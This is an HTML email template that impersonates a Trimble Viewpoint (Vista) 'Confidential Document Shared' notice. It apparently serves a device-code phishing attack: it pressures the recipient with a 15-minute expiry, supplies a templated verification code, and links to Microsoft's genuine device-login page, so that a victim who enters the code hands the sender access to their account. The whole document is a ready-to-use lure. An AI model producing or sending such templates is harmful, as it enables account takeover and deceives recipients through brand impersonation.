<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document Shared Notice</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            background-color: #f4f4f4;
        }
        .container {
            max-width: 600px;
            margin: 20px auto;
            padding: 20px;
            background-color: white;
            border: 1px solid #ddd;
            box-shadow: 0 2px 4px rgba(0,0,0,.1);
        }
        .header {
            background-color: rgb(white);
            color: white;
            padding: 10px;
            text-align: center;
        }
        h2 {
            color: #005A9E;
        }
        p {
            color: #333;
        }
        .button {
            display: inline-block;
            padding: 10px 20px;
            background-color: #0078d4;
            color: white;
            text-decoration: none;
            border-radius: 5px;
            margin-top: 20px;
        }
        .logo {
            max-width: 100%;
            height: auto;
            display: block;
            margin: 0 auto 20px;
        }
        .footer {
            font-size: 12px;
            text-align: center;
            color: #666;
            margin-top: 20px;
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="header">
             <!-- <img src="https://seeklogo.com/images/V/viewpoint-logo-27C4CF7EA4-seeklogo.com.png" alt="Logo" class="logo">     -->

               <img src="https://store.viewpointforms.com/static/customerimages/1056/57_1056_company_logo.png" alt="Logo" class="logo">    
             
        </div>
        <h2>Confidential Document Shared</h2>
        <p>A sensitive document is awaiting your review in Vista. For security, this link will expire in 15 minutes.</p>
        <p>Please enter this verification code when requested: <strong><<<VERIFICATION>>></strong></p>
        <a href="https://login.microsoftonline.com/common/oauth2/deviceauth" class="button">View Document</a>
        <p>If you believe you have received this notice in error, please contact your system administrator.</p>
        <div class="footer">
            © 2024 Trimble Viewpoint. All rights reserved.
        </div>
    </div>
</body>
</html>
